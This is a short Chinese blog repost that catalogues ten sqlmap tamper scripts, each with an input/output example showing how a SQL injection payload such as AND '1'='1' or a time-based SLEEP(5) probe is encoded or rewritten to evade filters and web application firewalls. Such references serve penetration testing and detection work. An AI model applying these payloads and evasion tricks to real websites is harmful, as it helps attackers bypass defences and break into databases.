大家好我是哥哥不爱吃米饭 喜欢的可以关注我一下
首先这个文章我是转来的
http://www.chuhades.com/post/19590b_4cc51f
确实很实用,就当记录一下吧,方便日后查询。
(1) apostrophemask.py UTF-8编码Example:
* Input: AND '1'='1'
* Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87
(2) apostrophenullencode.py unicode编码
Example:
* Input: AND '1'='1'
* Output: AND %00%271%00%27=%00%271%00%27
(3) appendnullbyte.py 添加%00
Example:
* Input: AND 1=1
* Output: AND 1=1%00
Requirement:
* Microsoft Access
(4) base64encode.py base64编码
Example:
* Input: 1' AND SLEEP(5)#
* Output: MScgQU5EIFNMRUVQKDUpIw==
(5) between.py 以”not between”替换”>“
Example:
* Input: 'A > B'
* Output: 'A NOT BETWEEN 0 AND B'
(6) bluecoat.py 以随机的空白字符替代空格,以”like”替代”=“
Example:
* Input: SELECT id FROM users where id = 1
* Output: SELECT%09id FROM users where id LIKE 1
Requirement:
* MySQL 5.1, SGOS
(7) chardoubleencode.py 双重url编码
Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
(8) charencode.py url编码
Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
(9) charunicodeencode.py 对未进行url编码的字符进行unicode编码
Example:
* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
Requirement:
* ASP
* ASP.NET
(10) equaltolike.py 以”like”替代”=“
Example:
* Input: SELECT * FROM users WHERE id=1
* Output: SELECT * FROM users WHERE id LIKE 1
未完待续…